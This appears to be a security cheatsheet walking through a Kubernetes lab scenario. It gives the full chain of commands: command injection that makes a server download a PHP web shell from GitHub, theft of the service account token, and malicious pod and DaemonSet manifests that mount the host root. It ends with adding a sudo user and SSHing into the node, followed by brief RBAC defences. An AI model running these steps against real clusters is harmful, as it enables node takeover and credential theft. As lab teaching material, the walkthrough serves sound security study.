[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]


.:: KUBERNETES Exploitation 1 ::.

~ Cheatsheet ~
cabir - KUBERNETES 1
Title :CLUSTER KUBERNETES - SCENARIO 1 : Inguardians Environnement
Author : cabir
Date : Sept 13, 2019
-=[ Privilege escalation with malicious pod ]=-
# FingerPrint 1. Inspect code 2. Inspect controller.js - http://10.23.58.40:31600/guestbook.php?cmd=set&key=message&value=test - http://10.23.58.40:31600/guestbook.php?cmd=set&key=command &value=curl%20https://raw.githubusercontent.com/artyuum/Simple-PHP-Web-Shell/master/ index.php%20 --output%20shell.php # Download WebShell with RCE curl https://github.com/artyuum/Simple-PHP-Web-Shell --output shell.php # Collect Data cat /run/secrets/kubernetes.io/serviceaccount/ca.crt cat /run/secrets/kubernetes.io/serviceaccount/token cat /run/secrets/kubernetes.io/serviceaccount/namespace # List pods ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 get pods # Check if I have permission to exec command in pods# ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 auth can-i exec pods # Exec an interactive shell in the pods ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it frontend-586dd8d476-cb8nc /bin/bash # Downlaod kubectl binary: curl -LO https://storage.googleapis.com/kubernetes-release/release/$(curl -s https://storage.googleapis.com/kubernetes-release/release/stable.txt)/bin/ linux/amd64/kubectl # Prompt Color: (User Friendly) PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033 [01;34m\]\w\[\033[00m\]\$ ' # Export Token in $TOKEN: export TOKEN=`cat /run/secrets/kubernetes.io/serviceaccount/token` # Setup alias: alias kubectl="/data/kubectl --token=$TOKEN --certificate-authority=/run/secrets/kubernetes.io/serviceaccount/ca.crt --server=https://10.23.58.40:6443" # Create a Malicious Pods to steal the host / (Read) apiVersion: v1 kind: Pod metadata: name: attack-pod namespace: default spec: containers: - image: janeczku/alpine-kubernetes imagePullPolicy: IfNotPresent name: attack-container volumeMounts: - mountPath: /root name: mount-host-root-into-mnt-pods volumes: - name: mount-host-root-into-mnt-pods hostPath: path: / OR # Use a malicious daemonset pod to have access on all nodes apiVersion: apps/v1 kind: DaemonSet metadata: name: attack-daemonset labels: app: attack-daemonset spec: selector: matchLabels: app: attack-daemonset template: metadata: labels: app: attack-daemonset spec: containers: - name: alpine-attack image: janeczku/alpine-kubernetes volumeMounts: - mountPath: /root name: mount-host-root-into-mnt-pods volumes: - name: mount-host-root-into-mnt-pods hostPath: path: / # Exec a shell in the attack-pod ./kubectl --token=`cat jwt.txt` --certificate-authority=ca.crt --server=https://10.23.58.40:6443 exec -it attack-pod /bin/sh # Chroot host file system chroot /root /bin/bash # Add a new user to ssh into the node adduser owned adduser owned sudo # Retrieve host IP cat /root/etc/network/interfaces # KVM uses ens3 auto ens3 iface ens3 inet static address 10.23.58.40 <---- netmask 255.255.255.0 gateway 10.23.58.2 dns-nameservers 10.23.58.2 # Connect to ssh to the host (Node) ssh owned@[node-ip] ________________________________________________ # Defending 1. Create a service account for redis 2. Create a Role to only get pods 3. Create a Role Binding for that (give the redis service account Role to only get pods) 4. Restart all redis pods # Sources Inguardians - Bust A Kube
[ Home ] [ Writeups ] [ Papers ] [ Cheatsheets ] [ About ]